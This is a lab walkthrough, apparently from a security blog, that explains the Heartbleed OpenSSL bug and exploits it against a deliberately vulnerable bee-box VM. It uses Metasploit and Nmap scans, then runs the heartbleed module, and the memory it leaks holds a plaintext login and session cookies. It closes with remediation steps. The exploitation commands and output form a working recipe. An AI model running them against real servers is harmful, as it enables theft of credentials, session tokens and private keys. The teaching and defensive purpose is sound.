CVE-2014-0160
Heartbleed Vulnerability
The TLS heartbeat extension lets one peer send a payload that the other side echoes back. In the affected OpenSSL versions the server trusts the 16-bit payload length declared in the heartbeat request without checking it against the size of the record it actually received, and copies that many bytes from its own heap into the response. An attacker who declares a large length while sending almost no payload therefore gets back up to 64 KB of the server process's memory per request, and can repeat the request as often as they like.
Impact: the leaked bytes are whatever happened to sit next to the request buffer on the heap, so repeated reads can expose the server's TLS private key, session cookies, usernames and passwords, and any other plaintext the server recently handled.
Affected versions: OpenSSL 1.0.1 through 1.0.1f and OpenSSL 1.0.2-beta through 1.0.2-beta1 contain "Heartbleed"; 1.0.1g fixed it, and the 0.9.8 and 1.0.0 branches never had the heartbeat code.
Test environment
Kali Linux 192.168.1.8
bee-box (Ubuntu target VM) 192.168.1.6
bee-box is the Ubuntu virtual machine that ships bWAPP (buggy web Application), an open-source web application deliberately built with common and recent vulnerabilities to help security enthusiasts, developers and students find and prevent web flaws. It covers more than 100 vulnerabilities, including the OWASP Top 10 risks, and, importantly for this exercise, the bee-box image also carries a vulnerable OpenSSL (Heartbleed) and a vulnerable Bash (ShellShock).
Like Metasploitable, bee-box is distributed as a pre-built virtual machine: extract the archive and open it directly in your VM software.
SSL (Secure Sockets Layer) and its successor TLS (Transport Layer Security) are protocols that provide confidentiality and data integrity for network communication.
TLS/SSL encrypts the connection between the transport layer and the application layer.
SSL/TLS services usually listen on 443, 8443, 4433 or a custom port; a port scan followed by version detection shows which ports speak TLS and, sometimes, which library version is behind them.
In the MSF console, first find out which ports are open on the target. For speed this uses the TCP connect port-scan module, which is also the least stealthy option since it completes a full handshake on every port.
msf5 > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     WordPress Pingback Locator
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   3  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   4  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   7  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner

Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner

msf5 > use 5
msf5 auxiliary(scanner/portscan/tcp) > options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.1.6      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      10               yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.6
rhosts => 192.168.1.6
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf5 auxiliary(scanner/portscan/tcp) > exploit

[+] 192.168.1.6:          - 192.168.1.6:25 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:22 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:21 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:80 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:139 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:443 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:445 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:512 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:514 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:513 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:666 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:3306 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:3632 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:5901 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:6001 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:8080 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:8443 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:9080 - TCP OPEN
[+] 192.168.1.6:          - 192.168.1.6:9443 - TCP OPEN
[*] 192.168.1.6:          - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
The target has 443, 8443 and 9443 open. MSF does include an SSL version-detection module, but its results are not very informative, so the next step uses Nmap's service detection instead.

root@X:~# nmap -sV -p 443,8443,9443 192.168.1.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 14:43 CST
Nmap scan report for bogon (192.168.1.6)
Host is up (0.00038s latency).

PORT     STATE SERVICE             VERSION
443/tcp  open  ssl/https?
8443/tcp open  ssl/https-alt       nginx/1.4.0
9443/tcp open  ssl/tungsten-https?
MAC Address: 00:0C:29:3E:BA:70 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.27 seconds

All three ports (443, 8443, 9443) run an SSL/TLS service. Next, the Nmap NSE script ssl-heartbleed is run against each port to test for "Heartbleed"; the script does not rely on a version banner but actually sends a malformed heartbeat and looks at the reply.
root@X:~# nmap -sV -p 443 --script ssl-heartbleed.nse 192.168.1.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 14:46 CST
Nmap scan report for bogon (192.168.1.6)
Host is up (0.00044s latency).

PORT    STATE SERVICE    VERSION
443/tcp open  ssl/https?
MAC Address: 00:0C:29:3E:BA:70 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.82 seconds

root@X:~# nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.1.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 14:46 CST
Nmap scan report for bogon (192.168.1.6)
Host is up (0.00044s latency).

PORT     STATE SERVICE       VERSION
8443/tcp open  ssl/https-alt nginx/1.4.0
|_http-server-header: nginx/1.4.0
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://www.openssl.org/news/secadv_20140407.txt
|_      http://cvedetails.com/cve/2014-0160/
MAC Address: 00:0C:29:3E:BA:70 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.43 seconds

root@X:~# nmap -sV -p 9443 --script ssl-heartbleed.nse 192.168.1.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 14:47 CST
Nmap scan report for bogon (192.168.1.6)
Host is up (0.00044s latency).

PORT     STATE SERVICE             VERSION
9443/tcp open  ssl/tungsten-https?
MAC Address: 00:0C:29:3E:BA:70 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.02 seconds

On 8443 the script reports "State: VULNERABLE" and "Risk factor: High". The sentence "OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug" is the script's generic description of the affected range, not a fingerprint of the installed version; the VULNERABLE verdict comes from the nginx on 8443 answering a malformed heartbeat with more data than it was sent. Ports 443 and 9443 produced no ssl-heartbleed output, so the script found nothing to report there.
Back in the MSF console, locate the OpenSSL "Heartbleed" scanner module.

msf5 > search auxiliary name:openssl

Matching Modules
================

   #  Name                                                   Disclosure Date  Rank    Check  Description
   -  ----                                                   ---------------  ----    -----  -----------
   0  auxiliary/dos/ssl/dtls_changecipherspec                2000-04-26       normal  No     OpenSSL DTLS ChangeCipherSpec Remote DoS
   1  auxiliary/dos/ssl/dtls_fragment_overflow               2014-06-05       normal  No     OpenSSL DTLS Fragment Buffer Overflow DoS
   2  auxiliary/dos/ssl/openssl_aesni                        2013-02-05       normal  No     OpenSSL TLS 1.1 and 1.2 AES-NI DoS
   3  auxiliary/scanner/ssl/openssl_ccs                      2014-06-05       normal  No     OpenSSL Server-Side ChangeCipherSpec Injection Scanner
   4  auxiliary/scanner/ssl/openssl_heartbleed               2014-04-07       normal  Yes    OpenSSL Heartbeat (Heartbleed) Information Leak
   5  auxiliary/server/openssl_altchainsforgery_mitm_proxy   2015-07-09       normal  No     OpenSSL Alternative Chains Certificate Forgery MITM Proxy
   6  auxiliary/server/openssl_heartbeat_client_memory       2014-04-07       normal  No     OpenSSL Heartbeat (Heartbleed) Client Memory Exposure

Interact with a module by name or index, for example use 6 or use auxiliary/server/openssl_heartbeat_client_memory

msf5 > use 4
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             443              yes       The target port (TCP)
   STATUS_EVERY      5                yes       How many retries until key dump status
   THREADS           1                yes       The number of concurrent threads (max one per host)
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)

Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability
Only the host and port need setting. RHOSTS is bee-box's address; RPORT defaults to 443, but the Nmap scan found the vulnerable service on 8443, so it has to be changed. VERBOSE is a global option that every module accepts even though `options` does not list it; with it enabled the module prints the handshake it performs and the leaked bytes rather than only a verdict. Note also that `options` shows only the current action (SCAN): `show actions` lists DUMP, which writes the leaked memory to a loot file, and KEYS, which searches the leaked memory for the server's RSA private key.

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 192.168.1.6
rhosts => 192.168.1.6
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 8443
rport => 8443
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true

With the options set, log in to the bee-box web application from Kali's browser with a username and password, so that a fresh HTTPS request carrying credentials is sitting in the server's memory, then run the module and look at the result.
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > exploit

[*] 192.168.1.6:8443 - Leaking heartbeat response #1
[*] 192.168.1.6:8443 - Sending Client Hello...
[*] 192.168.1.6:8443 - SSL record #1:
[*] 192.168.1.6:8443 -  Type:    22
[*] 192.168.1.6:8443 -  Version: 0x0301
[*] 192.168.1.6:8443 -  Length:  86
[*] 192.168.1.6:8443 -  Handshake #1:
[*] 192.168.1.6:8443 -    Length: 82
[*] 192.168.1.6:8443 -    Type:   Server Hello (2)
[*] 192.168.1.6:8443 -    Server Hello Version:           0x0301
[*] 192.168.1.6:8443 -    Server Hello random data:       5f1a8ad289f5809a4b512ac9a22237249b311a14ef12137e19752197ea669fa1
[*] 192.168.1.6:8443 -    Server Hello Session ID length: 32
[*] 192.168.1.6:8443 -    Server Hello Session ID:        89f0ea0e360dd67589a5fe1ea128e2dae58c88777b4dbe6de32c2c0e623500ce
[*] 192.168.1.6:8443 - SSL record #2:
[*] 192.168.1.6:8443 -  Type:    22
[*] 192.168.1.6:8443 -  Version: 0x0301
[*] 192.168.1.6:8443 -  Length:  675
[*] 192.168.1.6:8443 -  Handshake #1:
[*] 192.168.1.6:8443 -    Length: 671
[*] 192.168.1.6:8443 -    Type:   Certificate Data (11)
[*] 192.168.1.6:8443 -    Certificates length: 668
[*] 192.168.1.6:8443 -    Data length: 671
[*] 192.168.1.6:8443 -    Certificate #1:
[*] 192.168.1.6:8443 -      Certificate #1: Length: 665
[*] 192.168.1.6:8443 -      Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name [email protected],CN=bee-box.bwapp.local,OU=IT,O=MME,L=Menen,ST=Flanders,C=BE>, issuer=#<OpenSSL::X509::Name [email protected],CN=bee-box.bwapp.local,OU=IT,O=MME,L=Menen,ST=Flanders,C=BE>, serial=#<OpenSSL::BN:0x00007fe901ce4b68>, not_before=2013-04-14 18:11:32 UTC, not_after=2018-04-13 18:11:32 UTC>
[*] 192.168.1.6:8443 - SSL record #3:
[*] 192.168.1.6:8443 -  Type:    22
[*] 192.168.1.6:8443 -  Version: 0x0301
[*] 192.168.1.6:8443 -  Length:  203
[*] 192.168.1.6:8443 -  Handshake #1:
[*] 192.168.1.6:8443 -    Length: 199
[*] 192.168.1.6:8443 -    Type:   Server Key Exchange (12)
[*] 192.168.1.6:8443 - SSL record #4:
[*] 192.168.1.6:8443 -  Type:    22
[*] 192.168.1.6:8443 -  Version: 0x0301
[*] 192.168.1.6:8443 -  Length:  4
[*] 192.168.1.6:8443 -  Handshake #1:
[*] 192.168.1.6:8443 -    Length: 0
[*] 192.168.1.6:8443 -    Type:   Server Hello Done (14)
[*] 192.168.1.6:8443 - Sending Heartbeat...
[*] 192.168.1.6:8443 - Heartbeat response, 13027 bytes
[+] 192.168.1.6:8443 - Heartbeat response with leak, 13027 bytes
[*] 192.168.1.6:8443 - Printable info leaked:
......_.....}B.H..E..Q}~.....#..#....>..f.....".!.9.8.........5.............................3.2.....E.D...../...A.......................................nt: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36..Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9..Sec-Fetch-Site: same-origin..Sec-Fetch-Mode: navigate..Sec-Fetch-User: ?1..Sec-Fetch-Dest: document..Referer: https://192.168.1.6:8443/bWAPP/login.php..Accept-Encoding: gzip, deflate, br..Accept-Language: zh-CN,zh;q=0.9..Cookie: security_level=0; has_js=1; SSESS69d48e9cb2494800d35a2885f929b4c0=2cJgbKzUUqrxqCQESHGR3Ahi5hZghsqC5TLJA2FTa7Y; PHPSESSID=016a426db5693f8f8598a2efda6097f3....X...H...s..K.3.y; SSESS69d48e9cb2494800d35a2885f929b4c0=2cJgbKzUUqrxqCQESHGR3Ahi5hZghsqC5TLJA2FTa7Y....login=bee&password=bug&security_level=0&form=submit}?_....K.s...u.2..................................................................................................................................... repeated 11799 times .....................................................................................................................................
[*] 192.168.1.6:8443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

"Heartbeat response with leak, 13027 bytes": the single heartbeat reply carried 13,027 bytes of server memory, far more than the handful of bytes that were sent.
"login=bee&password=bug&security_level=0&form=submit"
The leaked memory contains the POST body of the login just performed from the Kali browser, with the plaintext username and password, plus the request's headers and session cookies (PHPSESSID and SSESS...). Against a production server the same leak would expose whatever other users had recently sent, and the module can be rerun (LEAK_COUNT) to harvest more of the heap.
Remediation
1. Take the affected server offline so it stops leaking sensitive data.
2. Stop the service linked against the old OpenSSL, upgrade OpenSSL to a fixed release (1.0.1g or later), and restart every process that had the old library loaded; a process that keeps running with the old libssl mapped stays vulnerable after the package upgrade.
3. Generate a new private key, because the attacker may already have recovered the old one through this vulnerability; submit a CSR for the new key to the CA and install the newly issued certificate on the server.
4. Bring the server back online.
5. Revoke the old certificate.
6. Invalidate all existing session cookies.
7. Require users to change their passwords.
Source: freebuf.com 2020-07-24 15:54:24 by: LXNSEC